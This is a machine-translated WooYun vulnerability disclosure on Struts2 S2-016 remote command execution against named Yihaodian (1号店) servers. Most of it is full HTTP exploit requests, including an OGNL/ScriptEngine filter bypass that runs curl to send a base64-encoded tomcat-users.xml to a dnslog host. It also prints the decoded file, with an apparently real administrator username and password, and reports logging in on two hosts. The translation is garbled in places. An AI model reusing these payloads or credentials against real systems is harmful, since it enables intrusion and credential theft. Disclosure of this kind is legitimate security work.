漏洞标题 1号店铺系统st2命令执行(保护旁路) 相关制造商 1号店 漏洞作者 Loopx9 提交时间 2016-05-11 11: 38 公共时间 2016-06-25 12: 30 漏洞类型 命令执行 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 补丁不及时,远程命令执行 漏洞详细信息 @ lijiejie的WooYun:腾讯移动端的一个功能SSRF可以探索/漫游内网(cloudeye artifact case)提到两个url跳转,乍一看它是s2-016命令执行。 http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com http://3pl.yihaodian.com/system/login_login.action?redirect:http://10.187.10.218 Tms2.yihaodian.com似乎已修复,但3pl.yihaodian.com尚未修复。 POST /system/login_view.action HTTP/1.1 用户代理: curl/7.33.0 主机: 3pl.yihaodian.com 接受: */* 代理连接:保持活动状态 内容长度: 196 内容类型: multipart/form-data;边界=------------------------ 4a606c052a893987 -------------------------- 4a606c052a893987 Content-Disposition: form-data; name='redirect: $ {#application.get('javax.servlet.context.tempdir')}' -1 -------------------------- 4a606c052a893987--
在测试期间,发现某些字符被过滤,并且无法显示“java.lang”。 更改了一个exp,使用java scriptengine来调用java方法: POST /system/login_view.action HTTP/1.1 用户代理: curl/7.33.0 主机: 3pl.yihaodian.com 接受: */* 代理连接:保持活动状态 内容长度: 396 内容类型: multipart/form-data;边界=------------------------ 4a606c052a893987 -------------------------- 4a606c052a893987 Content-Disposition: form-data; name='redirect: $ {new javax.script.ScriptEngineManager()。getEngineByName('js')。eval('new j \ u0061va.lang.ProcessBuilder ['(java.l \ u0061ng .String [])']( ['/bin/sh',' - c','curl xxoo.dnslog.info/$(cat/usr/local/tomcat6/conf/tomcat-users.xml|base64 -w 0)'])。start( )\ u003B ')}' -1 -------------------------- 4a606c052a893987--
读取tomcat-users.xml以获取tomcat管理用户和密码并将其发送到clueye,接收请求如下:
漏洞证明: Base64解码得到: <xml version='1.0'coding='utf-8'?> <! - 在一个或多个Apache软件基金会(ASF)下获得许可 贡献者许可协议。请参阅随附的NOTICE文件 这项工作有关版权所有权的其他信息。 ASF根据Apache许可证2.0版将此文件许可给您 ('许可');除非符合规定,否则您不得使用此文件 许可证。您可以在以下位置获取许可证副本 http://www.apache.org/licenses/LICENSE-2.0 包括适用法律要求或书面同意的软件 根据许可证分发的“按现状”分发, 不附带任何明示或暗示的保证或条件。 有关管理权限的特定语言,请参阅许可证 许可证下的合规性。 - > < Tomcat的用户> < role rolename='manager'/> < user username='monitor'password='OPS-monitoR'roights='manager'/> <! - < role rolename='tomcat'/> < role rolename='role1'/> < user username='tomcat'password='tomcat'roces='tomcat'/> < user username='both'password='tomcat'roles='tomcat,role1'/> < user username='role1'password='tomcat'roles='role1'/> - > </Tomcat的用户> 成功登录tomcat:
Tms2.yihaodian.com也配置了相同的用户名和密码,也成功登录:
修理计划: 。 版权声明:请注明出处loopx9 @乌云